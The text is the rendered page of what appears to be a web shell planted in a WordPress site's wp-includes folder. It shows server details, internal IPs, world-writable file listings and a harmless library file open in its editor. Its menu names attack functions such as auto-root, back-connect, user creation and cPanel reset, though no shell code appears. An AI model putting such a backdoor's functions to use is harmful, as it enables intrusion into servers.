Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
blog /
wp-includes /
Requests /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxrwxrwx
Cookie
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
Proxy
[ DIR ]
drwxrwxrwx
Response
[ DIR ]
drwxrwxrwx
Transport
[ DIR ]
drwxrwxrwx
Utility
[ DIR ]
drwxrwxrwx
Auth.php
810
B
-rw-rw-rw-
Cookie.php
12.55
KB
-rw-rw-rw-
Exception.php
1
KB
-rw-rw-rw-
Hooker.php
708
B
-rw-rw-rw-
Hooks.php
1.37
KB
-rw-rw-rw-
IDNAEncoder.php
11.06
KB
-rw-rw-rw-
IPv6.php
4.81
KB
-rw-rw-rw-
IRI.php
27.8
KB
-rw-rw-rw-
Proxy.php
813
B
-rw-rw-rw-
Response.php
2.45
KB
-rw-rw-rw-
SSL.php
3.93
KB
-rw-rw-rw-
Session.php
6.99
KB
-rw-rw-rw-
Transport.php
1.19
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Proxy.php
<?php /** * Proxy connection interface * * @package Requests * @subpackage Proxy * @since 1.6 */ /** * Proxy connection interface * * Implement this interface to handle proxy settings and authentication * * Parameters should be passed via the constructor where possible, as this * makes it much easier for users to use your provider. * * @see Requests_Hooks * @package Requests * @subpackage Proxy * @since 1.6 */ interface Requests_Proxy { /** * Register hooks as needed * * This method is called in {@see Requests::request} when the user has set * an instance as the 'auth' option. Use this callback to register all the * hooks you'll need. * * @see Requests_Hooks::register * @param Requests_Hooks $hooks Hook system */ public function register(Requests_Hooks &$hooks); }
Close